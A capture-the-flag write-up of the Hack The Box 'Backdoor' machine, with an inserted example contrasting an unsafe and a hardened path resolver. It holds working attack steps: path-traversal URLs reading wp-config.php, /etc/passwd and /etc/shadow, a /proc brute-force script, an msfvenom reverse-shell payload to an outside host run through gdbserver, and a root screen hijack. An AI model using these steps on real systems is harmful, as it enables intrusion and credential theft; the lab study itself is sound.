BACKDOOR HTB

Feras Kanaan (0xFK)
Dec 13, 2021

Complementary write-up about the backdoor machine

Quick scan

$ nmap -p- --min-rate=1000 -T4 10.129.188.175

Deep scan

nmap -sS -A -sC -sV -p- --min-rate 5000 10.129.188.175

Web Scan

└─$ gobuster dir -u http://10.129.188.175 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403" -z

Drill Down into wp-content folder

└─$ gobuster dir -u http://10.129.188.175/wp-content -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403" -z

Search for known exploits for the eBook Download plugin

└─$ searchsploit ebook wordpress
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
WordPress Plugin eBook Download 1.1 - Dire | php/webapps/39575.txt
WordPress Plugin Facebook Opengraph Meta 1 | php/webapps/17773.txt
WordPress Plugin Facebook Promotions 1.3.3 | php/webapps/17737.txt
WordPress Plugin Facebook Survey 1.0 - SQL | php/webapps/22853.txt
WordPress Plugin flash-album-gallery - 'fa | php/webapps/36383.txt
WordPress Plugin Nextend Facebook Connect | php/webapps/35439.txt
WordPress Plugin Spider Facebook - 'facebo | php/webapps/39300.txt
WordPress Theme Diary/Notebook Site5 - Ema | php/webapps/19862.pl
------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
http://10.129.193.79/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
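Added example, not part of the original write-up or of the plugin's code: the ebookdownloadurl parameter above is a user-controlled path that the plugin uses without a containment check, which is what lets ../ segments, absolute paths and a file:// URL reach arbitrary files. The Python below puts that unsafe pattern next to a hardened resolver. EBOOK_ROOT and the function names are assumptions for illustration, not the real plugin's layout.

```python
import os
from typing import Optional
from urllib.parse import urlsplit

# Assumed download directory for the example; the real plugin's layout is not
# known from the write-up.
EBOOK_ROOT = "/var/www/html/wp-content/uploads/ebooks"


def vulnerable_resolve(ebookdownloadurl: str) -> str:
    """The bug class: the request parameter is joined onto the base directory
    with no containment check. '..' segments walk out of EBOOK_ROOT, and an
    absolute path makes os.path.join discard the base entirely."""
    return os.path.join(EBOOK_ROOT, ebookdownloadurl)


def safe_resolve(ebookdownloadurl: str) -> Optional[str]:
    """Hardened counterpart: accept only a non-empty relative path that still
    sits inside EBOOK_ROOT after lexical normalisation. Anything else -> None."""
    if not ebookdownloadurl or "\x00" in ebookdownloadurl:
        return None
    # A scheme (file://, php://, http://) means the value is a URL, not a file name.
    if urlsplit(ebookdownloadurl).scheme:
        return None
    if os.path.isabs(ebookdownloadurl):
        return None
    # normpath collapses '.' and '..' purely lexically, so the result is
    # deterministic; a production check should additionally realpath() the
    # result to defeat symlinks planted inside EBOOK_ROOT.
    normalised = os.path.normpath(os.path.join(EBOOK_ROOT, ebookdownloadurl))
    # Containment is checked at a path-component boundary; a plain string
    # prefix test would accept '/var/www/html/wp-content/uploads/ebooks_old/x'.
    if os.path.commonpath([EBOOK_ROOT, normalised]) != EBOOK_ROOT:
        return None
    if normalised == EBOOK_ROOT:  # the directory itself is not a downloadable file
        return None
    return normalised


if __name__ == "__main__":
    for value in ("guide.pdf", "sub/../guide.pdf", "../../../wp-config.php",
                  "/etc/passwd", "file:///etc/shadow"):
        print(f"{value!r:28} unsafe={vulnerable_resolve(value)!r}")
        print(f"{'':28} safe={safe_resolve(value)!r}")
```

The order of the checks matters: the scheme test runs before any path handling, because a value such as file:///etc/shadow is not a path at all and must never reach the join.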

Reading files from the wp-includes folder

http://10.129.193.79/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-includes/comment.php

http://10.129.193.79/wp-includes/

Trying LFI for passwd

http://10.129.193.79/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd

└─$ gobuster dir -u http://10.129.188.175 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403" -z

-z  no progress output (gobuster's --no-progress)
-s  show only the listed status codes

Trying LFI for shadow

http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=file:///etc/shadow

Getting the user group

http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/group

login.defs

http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/login.defs

List of available shells and services

http://10.129.193.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/shells

http://10.129.188.175/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/services

/proc snippet to identify the service listening on port 1337

import requests

headers = {"content-type": "text"}

# Walk a PID range through the file read and fetch each process's command line.
for x in range(900, 1000):
    url = ("http://10.129.188.175/wp-content/plugins/ebook-download/"
           "filedownload.php?ebookdownloadurl=/proc/" + str(x) + "/cmdline")
    resp = requests.get(url, headers=headers)
    leno = len(resp.text)
    # Responses at or below the threshold are the plugin's empty answer (no such PID).
    if leno > 82:
        if '1337' in resp.text:
            print("\033[93m*** Found *** \n %d %s" % (leno, resp.text))
        else:
            print("\033[0m" + str(leno), resp.text)

The response-length threshold needs to be defined before going further.

The gdbserver has been identified using port 1337

Working with GDB

$ gdb
gdb-peda$ target extended-remote 10.129.188.175:1337

gdb-peda$ remote put shell.elf shello.elf
Successfully sent file "shell.elf".
gdb-peda$ set remote exec-file shello.elf
gdb-peda$ r
Handler

Search msfvenom for payload

$ msfvenom -l payload | grep linux/x64

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.136 LPORT=4444 -b "\x00\x20\x09\x0a" -a x64 --platform linux -f elf -o shell.elf

User shell received

Privilege Escalation

user@Backdoor:/home/user$ screen -ls root/
screen -ls root/
There is a suitable screen on:
1004.root (12/03/21 21:26:01) (Multi, detached)
1 Socket in /run/screen/S-root.
$ export TERM=xterm
$ screen -x root/root
